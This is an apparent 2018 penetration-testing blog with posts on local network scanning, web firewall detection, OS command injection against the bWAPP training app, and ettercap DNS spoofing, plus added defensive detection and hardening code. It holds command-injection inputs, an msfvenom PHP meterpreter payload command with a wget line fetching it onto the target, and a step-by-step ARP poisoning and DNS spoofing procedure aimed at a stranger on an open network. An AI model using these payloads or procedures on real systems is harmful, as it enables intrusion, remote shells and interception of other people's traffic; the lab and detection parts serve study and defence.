January 2018

Wednesday, 10 January 2018

Local Network Discovery Studies

Hello everyone.

Today I will write about local network discovery studies.

What Is ifconfig?

ifconfig is a system administration utility in Unix-like operating systems for network interface configuration.

The utility is a command line interface tool and is also used in the system startup scripts of many operating systems.

It has features for configuring, controlling, and querying TCP/IP network interface parameters. Ifconfig originally appeared in 4.2BSD as part of the BSD TCP/IP suite. (Wikipedia)


What Is Arping?

Arping is a computer software tool for discovering and probing hosts on a computer network.

Arping probes hosts on the attached network link by sending link-layer frames using the Address Resolution Protocol (ARP) request method, addressed to a host identified by the MAC address of its network interface.

The utility program may use ARP to resolve an IP address provided by the user.

arp-scan Installation And Usage

Command

Arch Linux: sudo pacman -S arp-scan

Debian: sudo apt-get install arp-scan

Usage

Command

arp-scan -I <interface> -l

(-l scans every address of the local network attached to the given interface.)

NMAP For Local Scan

My IP address is 192.168.1.102

Command

nmap -T4 -Pn 192.168.1.0/24

-T4 = the "aggressive" timing template; suitable for networks you know to be fast and reliable

-Pn = skip host discovery (no ICMP ping); every address in the range is treated as up and port-scanned

If you scan as root, nmap defaults to a SYN scan (-sS).
If you are not root, the scan falls back to a TCP connect scan (-sT).
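As an added defender's counterpart to the arp-scan and nmap sweeps above (example code written for this page, not part of the original post or of either tool): `arp-scan -l` produces a burst of ARP requests from one source for every address in the subnet, and that burst is easy to spot in a capture. The log lines below are constructed in tcpdump's ARP output style; the window and threshold values are assumptions to tune for your own network.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP request lines (not a real capture):
# "<epoch seconds> Request who-has <target> tell <source>"
SAMPLE_ARP_LOG = """\
1515570000.10 Request who-has 192.168.1.1 tell 192.168.1.50
1515570000.20 Request who-has 192.168.1.1 tell 192.168.1.102
1515570000.21 Request who-has 192.168.1.2 tell 192.168.1.102
1515570000.22 Request who-has 192.168.1.3 tell 192.168.1.102
1515570000.23 Request who-has 192.168.1.4 tell 192.168.1.102
1515570000.24 Request who-has 192.168.1.5 tell 192.168.1.102
1515570000.25 Request who-has 192.168.1.6 tell 192.168.1.102
1515570000.26 Request who-has 192.168.1.7 tell 192.168.1.102
1515570000.27 Request who-has 192.168.1.8 tell 192.168.1.102
1515570005.00 Request who-has 192.168.1.254 tell 192.168.1.50
"""

ARP_RE = re.compile(
    r"^(?P<ts>\d+\.\d+) Request who-has (?P<target>[\d.]+) tell (?P<src>[\d.]+)$"
)

def parse_arp_requests(text):
    """Return (timestamp, source, target) tuples; non-matching lines are skipped."""
    out = []
    for line in text.splitlines():
        m = ARP_RE.match(line.strip())
        if m:
            out.append((float(m.group("ts")), m.group("src"), m.group("target")))
    return out

def find_arp_sweeps(requests, window=2.0, threshold=8):
    """Flag sources that asked for >= threshold distinct targets inside any
    `window` seconds. A normal host resolves a few neighbours; arp-scan -l asks
    for every address in the subnet within a fraction of a second.
    Returns {source: most distinct targets seen in one window}."""
    by_src = defaultdict(list)
    for ts, src, target in requests:
        by_src[src].append((ts, target))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        best = 0
        for i, (start, _) in enumerate(events):
            targets = {t for ts, t in events[i:] if ts - start <= window}
            best = max(best, len(targets))
        if best >= threshold:
            flagged[src] = best
    return flagged
```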

Thank you for reading



Monday, 8 January 2018

Firewall Detection in Penetration Tests




Hello everyone.

Today I will write about firewall detection in penetration testing.
Please let me know your views on the articles.

E-Mail = berkdusunurx@gmail.com
Twitter = @berkdusunur

What Is A Firewall?


In computing, a firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. A firewall typically establishes a barrier between a trusted internal network and an untrusted external network, such as the Internet.
Firewalls are often categorized as either network firewalls or host-based firewalls. Network firewalls filter traffic between two or more networks and run on network hardware. Host-based firewalls run on host computers and control network traffic in and out of those machines. (Wikipedia)

WAFW00F

WAFW00F identifies and fingerprints Web Application Firewall (WAF) products.

How does it work?

To do its magic, WAFW00F does the following:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions
  • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is
  • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks
For further details, check out the source code on the main site, github.com/sandrogauci/wafw00f.
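The three steps above, sketched as an added Python example (not WAFW00F's code): passive header matching first (step 1), then the differential check between a normal response and the response to a suspicious-looking request (step 3). Only the Cloudflare signature, the `Server: cloudflare` header together with `CF-RAY`, is encoded; the responses are constructed, and running this against your own site shows what your edge reveals.

```python
# Constructed (status, headers) pairs standing in for scanner responses; not real captures.
NORMAL_RESPONSE = (200, {"Server": "cloudflare", "CF-RAY": "0000000000000000-FRA", "Content-Type": "text/html"})
BLOCKED_RESPONSE = (403, {"Server": "cloudflare", "CF-RAY": "0000000000000001-FRA", "Content-Type": "text/html"})
PLAIN_OK = (200, {"Server": "nginx", "Content-Type": "text/html"})
PLAIN_DENIED = (403, {"Server": "nginx", "Content-Type": "text/html"})

# Passive signatures: (header name, substring expected in its value), all case-insensitive.
# Cloudflare's "Server: cloudflare" plus the CF-RAY header is the one well-known pair
# encoded here; other products would be added the same way.
SIGNATURES = {
    "Cloudflare": [("server", "cloudflare"), ("cf-ray", "")],
}

def fingerprint_passive(headers):
    """Step 1: name the product from the headers of a normal response, else None."""
    lowered = {k.lower(): v.lower() for k, v in headers.items()}
    for product, checks in SIGNATURES.items():
        if all(name in lowered and needle in lowered[name] for name, needle in checks):
            return product
    return None

def refuses_probe(normal, probed):
    """Step 3: a normal request succeeds but a suspicious-looking one gets a
    4xx/5xx: something in front of the application is filtering."""
    return normal[0] < 400 <= probed[0]

def classify(normal, probed):
    """Combine the steps in the order the text describes: passive match first,
    differential behaviour second, otherwise 'no WAF detected' (None)."""
    product = fingerprint_passive(normal[1])
    if product:
        return product
    if refuses_probe(normal, probed):
        return "generic WAF/filter"
    return None
```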

Install And Usage

We fetch the tool from the GitHub repo:

Code

git clone https://github.com/EnableSecurity/wafw00f.git

Now change into the cloned directory and install:

Code

1- cd wafw00f
2- ls
3- chmod +x setup.py
4- python setup.py install

This installs the required packages.

First Scan

Code

wafw00f www.berkdusunur.net

It made 15 requests but could not detect a firewall.

Code

wafw00f canyoupwn.me

It found CloudFlare IDS.

Code

wafw00f twitter.com
Similar Tools

Waf-Detector

This is a simple package for Web Application Firewall Detection. It supports CloudFlare, Incapsula, ModSecurity, and Shieldfy out of the box.

Install

git clone https://github.com/shieldfy/waf-detector.git

Install Composer

For Arch Linux: pacman -S composer

For Debian: apt-get install composer

Code

composer require shieldfy/waf-detector



We will bypass many firewall systems, including CloudFlare, in my next article.

Thank You For Reading

Stay tuned.

Tuesday, 2 January 2018

OS Command Injection Unauthorized Access

Hello Everyone :)

bWAPP

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.

bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 100 web bugs! It covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project. The focus is not just on one specific issue... bWAPP is covering a wide range of vulnerabilities!

bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or XAMPP. Another possibility is to download bee-box, a custom VM pre-installed with bWAPP.

This project is part of the ITSEC GAMES project. You can find more about the ITSEC GAMES and bWAPP projects on our blog.

For security-testing and educational purposes only!

 

OS Command Injection

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.

In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.



Code

;ls
;pwd
;whoami
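As an added example (not bWAPP's own PHP, which is the vulnerable application here), the same bug and its fix in Python: the vulnerable function pastes the form value into a shell command line, so an input ending in `;ls` makes the shell run a second command; the hardened version validates the value as a hostname and passes it as one argv element with no shell involved. The `nslookup` wrapper is assumed for illustration.

```python
import re
import subprocess

# RFC 1123 hostname shape: labels of letters/digits/hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def vulnerable_command(target):
    """The bWAPP-style bug: the form value is pasted into a command line that is
    handed to a shell. (The nslookup wrapper is an assumption for illustration.)"""
    return "nslookup " + target

def shell_would_run(target):
    """What a shell executes for the vulnerable string: ';' ends the intended
    command and everything after it becomes a second command."""
    return [part.strip() for part in vulnerable_command(target).split(";") if part.strip()]

def is_valid_hostname(target):
    """Allow-list check: anything that is not a plain hostname is rejected."""
    return bool(HOSTNAME_RE.match(target))

def safe_argv(target):
    """Hardened: validate first, then build an argv list. With no shell involved,
    ; | & ` $ ( ) are plain characters, not separators."""
    if not is_valid_hostname(target):
        raise ValueError("rejected input: %r" % target)
    return ["nslookup", target]

def run_lookup(target, timeout=10):
    """Execute the hardened form only; subprocess.run with a list never spawns a shell."""
    proc = subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout
```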


Using the MSFvenom Command Line Interface

Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.

Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.
The advantages of msfvenom are:
  • One single tool
  • Standardized command line options
  • Increased speed

MSFVENOM PHP PAYLOAD

Code

msfvenom -p php/meterpreter/bind_tcp LHOST=ipaddress LPORT=4448 > berkdusunur.php

Code

;wget http://ip.add.re.ss/berkdusunur.php

And Meterpreter :)




Thank You For Reading 


You can follow us on Twitter @berkdusunur

Monday, 1 January 2018

DNS Spoofing (DNS Poisoning)



Hello everyone :)

I'm going to do a DNS poisoning scenario today. I want to do DNS spoofing in an open and free network.

Okay, let's start :)
You can follow us on Twitter @berkdusunur

Attacker IP address


We will use the tool ettercap. We first need to make some configuration changes.
I will start with the file etter.dns. If desired, a single domain name or all domain names can be attacked.

/etc/ettercap/etter.dns

I am attacking all domain names with the entry:

*                        A                         192.168.1.107

I save and exit.

Then open the etter.conf file and enable redirects for Linux: I removed the "#" in front of the iptables lines.

/etc/ettercap/etter.conf
Then I start my Apache service.

service apache2 start


Then I open the Ettercap tool and enter the necessary parameters.

Sniff > Unified sniffing

My interface is wlan0

Hosts > Scan for hosts > Hosts list

Add the gateway to Target 1 and one beautiful girl to Target 2 :)

Then Mitm > ARP poisoning > Sniff remote connections

Plugins > Manage the plugins > dns_spoof

Okay, Start > Start sniffing :)
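The wildcard etter.dns entry used in the procedure above (every name answered with one LAN address) leaves a very recognisable trace, and as an added defender's example (not part of the original post or of ettercap) this Python sketch finds it in a DNS answer log: one private IP being returned for many unrelated names, and the same name resolving differently for poisoned and unpoisoned clients. The log lines and the threshold are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed DNS answer log (not a real capture): "<client> <query name> A <answer ip>".
SAMPLE_DNS_LOG = """\
192.168.1.55 www.example.com A 192.168.1.107
192.168.1.55 mail.example.org A 192.168.1.107
192.168.1.55 cdn.example.net A 192.168.1.107
192.168.1.55 shop.example.com A 192.168.1.107
192.168.1.60 intranet.corp.example A 192.168.1.10
192.168.1.60 www.example.com A 93.184.216.34
"""

def parse_dns_log(text):
    """Return (client, name, answer_ip) tuples for A-record answers."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[2] == "A":
            records.append((parts[0], parts[1].lower(), parts[3]))
    return records

def suspicious_answers(records, min_names=3):
    """{answer_ip: sorted names} for private/link-local answer IPs handed out for
    >= min_names distinct names. A wildcard etter.dns line ('* A <attacker ip>')
    produces exactly this: unrelated names all collapsing onto one LAN address."""
    names_by_ip = defaultdict(set)
    for _client, name, ip in records:
        names_by_ip[ip].add(name)
    hits = {}
    for ip, names in names_by_ip.items():
        addr = ipaddress.ip_address(ip)
        if (addr.is_private or addr.is_link_local) and len(names) >= min_names:
            hits[ip] = sorted(names)
    return hits

def conflicting_names(records):
    """Names that resolved to different IPs for different clients: a second sign,
    since only the poisoned clients receive the spoofed answer."""
    ips_by_name = defaultdict(set)
    for _client, name, ip in records:
        ips_by_name[name].add(ip)
    return {n: sorted(ips) for n, ips in ips_by_name.items() if len(ips) > 1}
```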